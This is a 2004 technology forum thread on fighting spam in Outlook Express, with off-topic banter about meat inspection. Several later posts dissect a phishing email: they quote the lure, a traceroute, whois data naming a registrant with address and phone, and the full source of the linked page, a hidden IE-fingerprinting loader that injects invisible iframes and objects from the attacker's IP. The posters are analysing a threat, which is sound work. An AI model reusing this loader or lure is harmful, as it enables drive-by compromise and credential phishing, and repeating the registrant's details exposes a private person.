Post #151,581
4/18/04 10:29:48 AM
4/18/04 10:30:59 AM
|
SPAM Question
I use Outlook Express as my email client in my Windows machine..
I'm getting a lot of SPAM and I've noticed that it's not usually addressed directly TO me in the To: line.
I had an idea to redirect all mail not addressed directly to me to a junk mail folder. Can I change the default mail delivery to go to the junk mail folder, then move all the mail addressed to me to my Inbox or something? It appears you cannot block everything NOT addressed to email a, b, c, which is what I wanted the default rule to be.
I had tried moving anything with viagra, cialis, bad debt, consolidation, etc. to the junk mail folder, but that is not working because they commonly misspell the words to beat that system. I even tried putting some of the common misspellings in, but it appears these people use random letters and symbols to make it difficult.
Earlier, I had tried to block certain email addresses and domains, but I actually blocked a friend on juno.com by accident, so I gave up on that approach.
Ideas?
I guess I could spend a little money for something, but you guys will have to make a recommendation (or if there's something for free), but the SPAM is starting to annoy me at about 15-20 messages per day.
Edited by gdaustin
April 18, 2004, 10:30:59 AM EDT
|
Post #151,584
4/18/04 11:14:53 AM
|
You've got it easy. :-)
I'm getting 150 or so pieces of spam a day. Since only get 1-2 real pieces of e-mail a day, it's pretty easy for me to quickly delete the spam.
The standard solution to this problem is SpamAssassin. I'm using a precompiled version for Windows called [link|http://www.statalabs.com/|SAProxy] which doesn't seem to be available now (replaced by SAProxyPro). It catches a lot of spam out of the box and presumably can be taught to catch more, but I haven't taken the time to try to figure out how to do it with my e-mailer (PMMail).
Note SAProxyPro is shareware, $29.95. I haven't tried it.
Spam Assassin can be installed on Win32 (see, e.g. [link|http://www.openhandhome.com/howtosa260.html|this] page), but it's fairly involved (you need to install ActivePerl, etc., and there are some limitations).
v6.1 of [link|http://eudora.com/email/|Eudora] has fairly good spam filters that are easy to teach, but you need the paid mode to access that feature - $49.95.
Most of the stuff discussed here on IWeThey has been for Linux, but searching through the archive may be useful.
HTH, a bit.
Cheers,
Scott.
|
Post #151,794
4/19/04 1:37:35 PM
|
Mozilla is your friend
Two lines of defense in its mail client:
1) Message filter: easy to use, but not very bright (when will someone implement a message filter with Boolean logic (AND, OR, AND NOT, NEAR) and/or regular expressions?)
2) Span Idenitifier: Automatically teaches itself what constitutes SPAM. I get approx. 500 Spams a week, and this thing pegs about 90% of it. You have to teach it what's SPAM and what's not, but after a while, it gets pretty good.
jb4
shrub\ufffdbish (Am., from shrub + rubbish, after the derisive name for America's 43 president; 2003) n. 1. a form of nonsensical political doubletalk wherein the speaker attempts to defend the indefensible by lying, obfuscation, or otherwise misstating the facts; GIBBERISH. 2. any of a collection of utterances from America's putative 43rd president. cf. BULLSHIT
|
Post #151,585
4/18/04 11:16:41 AM
|
You're getting SPAM?
Blimey.
Tinned meat through the email.
[Note for the humour-impaired; SPAM is the trademark held by Hormel Foods on their particular brand of spiced pork and ham, and always refers to a tasty food product. Spam is the shite you get in your email inbox]
More details please. Your scheme won't work; you need something stronger.
Platform? Client? Do you control your mail server?
Peter
[link|http://www.debian.org|Shill For Hire]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Blog]
|
Post #151,594
4/18/04 12:55:33 PM
|
s/tasty/horribly nasty
Nobody wins in a butter eating contest
|
Post #151,595
4/18/04 1:02:05 PM
|
Feh to you and your wussy tastebuds.
Peter
[link|http://www.debian.org|Shill For Hire]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Blog]
|
Post #151,597
4/18/04 1:12:47 PM
|
Bah, I like my meat to be identifiable.
|
Post #151,660
4/18/04 7:45:08 PM
|
Ever eat a hotdog or burger?
Just don't think "cat".
Peter
[link|http://www.debian.org|Shill For Hire]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Blog]
|
Post #151,663
4/18/04 7:49:04 PM
|
Bingo.
I stay away from meat I can't identify.
Nobody wins in a butter eating contest
|
Post #151,665
4/18/04 7:54:00 PM
|
Or...
Do you know there is a measurement standard for amount of RAT feces in Hotdog Grind? As well as the amount of RAT protein.
Or that there is standard for the measurement of amount of cowhide(with hair count) in Hotdog grind?
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Give a man a match, he'll be warm for a minute.
Set him on fire, he'll be warm for the rest of his life!
|
Post #151,671
4/18/04 8:29:24 PM
|
headcheese, hotdogs with boiled hooves
"You're just like me streak. You never left the free-fire zone.You think aspirins and meetings and cold showers are going to clean out your head. What you want is God's permission to paint the trees with the bad guys. That wont happen big mon." Clete
questions, help? [link|mailto:pappas@catholic.org|email pappas at catholic.org]
|
Post #151,677
4/18/04 9:03:55 PM
|
Head cheese is even better than hotdogs . .
. . since you can easily identify many of the pig parts it's made from. It has more texture and a more interesting appearance. I love head cheese, but it's distressingly fattening.
[link|http://www.aaxnet.com|AAx]
|
Post #151,676
4/18/04 9:02:01 PM
|
So? Did you know . .
. . there are standards controling how much rat shit is allowed in your breakfast cereal? And the allowable number of insect parts? The same goes for bread and bakery products, catsup, and just about anything else categorized by the FDA.
[link|http://www.aaxnet.com|AAx]
|
Post #151,765
4/19/04 12:06:32 PM
|
Yeah... I was just trying to pile on.
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Give a man a match, he'll be warm for a minute.
Set him on fire, he'll be warm for the rest of his life!
|
Post #151,681
4/18/04 9:25:00 PM
|
Urban legend?
In my browsing around the USDA's FSIS site I've seen pages that indicate there's a "Zero Tolerance" policy for beef feces. On [link|http://www.fsis.usda.gov/OPPDE/rdad/FSISDir7000.htm|this] page of directives for processed products I haven't been able to find anything about permissible levels of rat hair or feces. They have several directives about controlling bacteria, etc.
Are you sure this isn't an urban legend from the days before the USDA when hot dogs were made of sawdust and the like? I'd be very interested in a link if you can find one. Thanks.
Cheers,
Scott.
|
Post #151,684
4/18/04 9:35:15 PM
|
I know a meat cutter who slaughtered in CA
the inspectors would walk by rat carcasses and complain that the procedures were wrong, cutting bla before Ka.
Alway enjoyed his stories of eating lunch with feces up to his elbows and daintily holding the sarnie via the waxed paper.
thanx,
bill
"You're just like me streak. You never left the free-fire zone.You think aspirins and meetings and cold showers are going to clean out your head. What you want is God's permission to paint the trees with the bad guys. That wont happen big mon." Clete
questions, help? [link|mailto:pappas@catholic.org|email pappas at catholic.org]
|
Post #151,767
4/19/04 12:13:43 PM
|
Nope, NOT urban legend.
That was RAT feces and RAT protein.
And it was cowhide(with hair count), or leather, not Bovine Feces.
Bovine Feces gets washed off at the Slaughter house, with a special wash.
And, since I lived next door to a "Mr. Turkey meat inspector" he showed me the "Book". It was current as of 1998 when he showed me. He has now retired to Florida. But I could prolly get ahold of him for you.
You have to get the Full listings of the 2 inch thick book. I do not believe they publish it on the net. For just such reasons as people would FREAK OUT about the fact there is even a measurment for these things.
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Give a man a match, he'll be warm for a minute.
Set him on fire, he'll be warm for the rest of his life!
|
Post #151,797
4/19/04 1:43:25 PM
|
Makes me wonder.
I mean, where do people think this stuff comes from? The Meat Tree or something?
--\n-------------------------------------------------------------------\n* Jack Troughton jake at consultron.ca *\n* [link|http://consultron.ca|http://consultron.ca] [link|irc://irc.ecomstation.ca|irc://irc.ecomstation.ca] *\n* Kingston Ontario Canada [link|news://news.consultron.ca|news://news.consultron.ca] *\n-------------------------------------------------------------------
|
Post #151,818
4/19/04 2:40:58 PM
|
There are also thick books of pictures . .
. . at various magnifications to help inspectors identify various insect parts, feces, etc. Back when I dealt with government standards I saw advertisements for those books.
[link|http://www.aaxnet.com|AAx]
|
Post #152,939
4/28/04 4:55:26 PM
|
..and for spices, most other 'foods'
Nobody expects these counts to be Zero (except naive consumers, in the homogenized society). I vas dere, saw some of the filter screens and their contents.
Yup, we eats lots of (little bits of) shit.
Organic life is Messy, like Us. (and US)
moi, another dirty, messy excreting organism with delusions of Grandeur
|
Post #151,637
4/18/04 5:41:32 PM
|
Win32 Client / Debian 3.0 Firewall / Comcast.net mail server
I don't run my own email server because I don't have a dedicated IP, just a DHCP one.
But I do have a Linux box that sits in front of the Win32 box, doing NAT and blocking standard hacker ports and the like. It also keeps the script kiddie stuff out of my system (unless it comes from email).
Glen
|
Post #151,588
4/18/04 11:27:45 AM
|
I like the ocational nugget of corn in the steaming pile
"You're just like me streak. You never left the free-fire zone.You think aspirins and meetings and cold showers are going to clean out your head. What you want is God's permission to paint the trees with the bad guys. That wont happen big mon." Clete
questions, help? [link|mailto:pappas@catholic.org|email pappas at catholic.org]
|
Post #151,687
4/18/04 9:38:46 PM
|
Same problem at work
Required to use IE. And workstation locked down so can't add any software.
I set rule to move all incoming mail to "Possible Junk" except for addresses on my exception list. As I find a "good" address in the junk box I add it to my exception list. Has done wonders for getting my mail clean. Also, I turned on the new mail notification and then created another rule. If I get mail from anyone on my expection list, I get a selected notice. Of course, as usual YMMV.
|
Post #151,715
4/19/04 12:56:59 AM
4/19/04 12:58:21 AM
|
A sneaky Spam just received
Subject: Your email account frozen! Mime-Version: 1.0 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Status: <HTML> <BODY> Good day,<BR><BR> Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.<BR> After this problem your e-mail account was frozen(you can`t send or receive messages),<BR> to re-activate e-mail click <A href="http://161.58.140.37/">here</a><BR><BR> <BR> - -<BR> Sincerely,<BR> E-mail Admin.<BR> </BODY> </HTML> ************************************************************************* If anyone can pinpoint that ip address of this I would be interested to hear the results (is usually a waste of time trying to tracerte it from here). Doug Marker
Edited by dmarker
April 19, 2004, 12:58:21 AM EDT
Edited by dmarker
April 19, 2004, 12:58:21 AM EDT
|
Post #151,733
4/19/04 8:32:35 AM
|
Re: A sneaky Spam just received
From a Winblows box: Tracing route to www.sienestr.com [161.58.140.37]\nover a maximum of 30 hops:\n\n 1 2 ms 1 ms 2 ms c-24-16-231-252.client.comcast.net [24.16.231.252] \n 2 * * * Request timed out.\n 3 10 ms 11 ms 16 ms 12.244.21.145 \n 4 11 ms 11 ms 13 ms 12.244.72.18 \n 5 12 ms 23 ms 11 ms tbr1-p012402.st6wa.ip.att.net [12.122.5.174] \n 6 31 ms 32 ms 28 ms tbr2-cl1.sffca.ip.att.net [12.122.12.113] \n 7 26 ms 26 ms 30 ms ggr2-p390.sffca.ip.att.net [12.123.13.194] \n 8 28 ms 28 ms 28 ms p16-0-1-1.r20.plalca01.us.bb.verio.net [129.250.9.73] \n 9 83 ms 83 ms 83 ms p16-0-1-3.r21.asbnva01.us.bb.verio.net [129.250.2.193] \n 10 92 ms 84 ms 81 ms p64-0-0-0.r20.asbnva01.us.bb.verio.net [129.250.2.34] \n 11 94 ms 86 ms 86 ms ge-0-0-0.r00.stngva01.us.wh.verio.net [129.250.27.187] \n 12 83 ms 85 ms 81 ms 204.2.125.106 \n 13 84 ms 84 ms 87 ms www.sienestr.com [161.58.140.37] \n\nTrace complete. Nobody wins in a butter eating contest
|
Post #151,735
4/19/04 8:52:44 AM
|
More info
Domain Name.......... sienestr.com
Creation Date........ 2004-04-17
Registration Date.... 2004-04-17
Expiry Date.......... 2014-04-17
Organisation Name.... Toofy company
Organisation Address. 1840 Mt Ephraim Rd
Organisation Address.
Organisation Address. Adamstown
Organisation Address. 21710 Organisation Address. MD
Organisation Address. UNITED STATES
Admin Name........... David Toof
Admin Address........ 1840 Mt Ephraim Rd
Admin Address........
Admin Address........ Adamstown
Admin Address........ 21710
Admin Address........ MD
Admin Address........ UNITED STATES
Admin Email.......... dave_toof@yahoo.com
Admin Phone.......... (301)8745311
Admin Fax............
Tech Name............ Verio Hostmaster
Tech Address......... 5050 Blue Lake Dr.
Tech Address.........
Tech Address......... Boca Raton
Tech Address......... 33431
Tech Address......... FL
Tech Address......... UNITED STATES
Tech Email........... hostmaster@VERIO-HOSTING.COM
Tech Phone........... 888-663-6648
Tech Fax.............
Name Server.......... ns19a.nameservers.net
Name Server.......... ns19b.nameservers.net
|
Post #151,845
4/19/04 6:29:57 PM
|
Was anyone game to vistit the site with a browser :-)
I used 1 machine to access the web server but immediately got a message
'loading' in the middle of the screen & killed it.
Didn't have the time & wasn't prepared enough for evaluating the damage the site might be up to. My guess is it would be a spyware site that loads (if it can) spyware.
Later tonight I might do a controlled experiment using a Virtual PC & will let you know what transpires.
Doug M
|
Post #151,847
4/19/04 6:41:40 PM
|
I did.
Mozilla on Linux - just said that 'my account' was restored.
Imric's Tips for Living
- Paranoia Is a Survival Trait
- Pessimists are never disappointed - but sometimes, if they are very lucky, they can be pleasantly surprised...
- Even though everyone is out to get you, it doesn't matter unless you let them win.
|
Nothing is as simple as it seems in the beginning,
As hopeless as it seems in the middle,
Or as finished as it seems in the end.
|
|
Post #151,848
4/19/04 6:47:06 PM
|
Page source for main page:
<HTML xmlns:IE>\n<TITLE>Loading...</TITLE>\n <HEAD>\n <STYLE type='text/css'>\n IE:clientCaps {behavior:url(#default#clientcaps)}\n </STYLE>\n \n <SCRIPT language="JavaScript">\n\n function GetVersion(CLSID)\n {\n if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")) \n {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");} \n else \n {return Array(0,0,0,0);}\n }\n </SCRIPT> \n<meta http-equiv="refresh" content="3; url=thx.html"> \n </HEAD>\n<BODY>\n [image|http://161.58.140.37/cgi-local/userstat.cgi|||1|1]\n <IE:clientCaps ID="oClientCaps" />\n\n <SCRIPT language="JavaScript">\n if (navigator.appName=="Microsoft Internet Explorer")\n {\n var IEversion=navigator.appVersion;\n var IEplatform=navigator.platform;\n if (IEplatform.search("Win32") != -1)\n {\n if (IEversion.search("MSIE 5.0") != -1)\n {\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n }\n if (IEversion.search("MSIE 5.5") != -1)\n {\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n }\n if (IEversion.search("MSIE 6.0") != -1)\n {\n var Version_IE = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");\n PatchList = clientInformation.appMinorVersion;\n document.write('<iframe src="[link|http://161.58.140.37/cgi-local/ie.cgi?vers='+Version_IE+PatchList+'|http://161.58.140.37...on_IE+PatchList+']"style="display:none"></iframe>');\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>'); \n \n }\n }\n }\n \n </SCRIPT>\n<BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><H2>\n<CENTER>\n<B>Loading....</B></CENTER></H2>\n \n</BODY>\n</HTML>Nobody wins in a butter eating contest
|
Post #151,850
4/19/04 6:49:59 PM
|
HTML help exploit?
Looks like it is trying to take advantage of one of the many local execution errors common in IE - does not appear to do anything to Mozilla.
Nobody wins in a butter eating contest
|
Post #151,849
4/19/04 6:48:28 PM
|
Page source for thx.html
<HTML>\n<TITLE>Thank you!</TITLE>\n <HEAD>\n <STYLE type='text/css'>\n IE:clientCaps {behavior:url(#default#clientcaps)}\n </STYLE>\n </HEAD>\n<BODY>\n <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>\n<CENTER><B>Thank you!<BR><BR>\nNow your e-mail account re-activated!<BR>\n\nSincerely,<BR>\nE-mail Admin.<BR>\n</B></CENTER>\n\n \n</BODY>\n</HTML>Nobody wins in a butter eating contest
|
Post #152,966
4/28/04 7:05:38 PM
4/28/04 7:11:31 PM
|
Two options for you
but first, a question? How much are you willing to pay to block Spam?
If the answer is nothing or free:
[link|http://spambayes.sourceforge.net/windows.html|http://spambayes.sou....net/windows.html]
Scroll to the bottom of the screen to see a Non-Outlook solution.
POP3 filter named SB_Server:
[link|http://spambayes.sourceforge.net/applications.html#sb_server|http://spambayes.sou...ns.html#sb_server]
I assume you have both Spam and Ham examples to train it?
BTW the best use of Python I have yet seen. ;)
If you do want to pay for a subscription:
[link|http://www.mailfrontier.com/|http://www.mailfrontier.com/]
SAProxy is garbage, I use it and when I get an attachment it chokes and refuses to get the rest of my mail from the mail server. That is on my desktop machine and I have to use an account to read mail without SAProxy to clean out my mailbox. I use Spambayes on my laptop and it works wonders, never choked yet.
Spambayes now does POP3 filtering so it works with more than just Outlook, so if you move to Mozilla or Eudora, you could still use it.
I just learned how to set up Evolution with Spam Assassin under Lindows, woot! Now if only Evolution had spell checking. ;)
"What's the use of saving life when you see what you do with it?" - Corbin Dallas "The Fifth Element"
Edited by orion
April 28, 2004, 07:11:31 PM EDT
|
